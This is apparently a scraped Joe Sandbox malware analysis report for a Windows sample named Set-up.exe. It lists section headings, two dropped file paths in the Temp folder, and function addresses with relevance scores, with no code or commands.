Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\NrIpUDVFuuHZveDEtrIh.dll

C:\Users\user\AppData\Local\Temp\service123.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
Set-up.exe

Function 0066116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Function 6C9414B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Function 006615B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Function 006681E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 87
libraryloaderCOMMON

Function 00668230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 90
libraryloaderCOMMON

Function 006613C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Function 006611A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Function 00661160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Function 6CA14230 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Function 00661296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Function 006613BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Function 6C95B1A0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Function 6C95B310 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON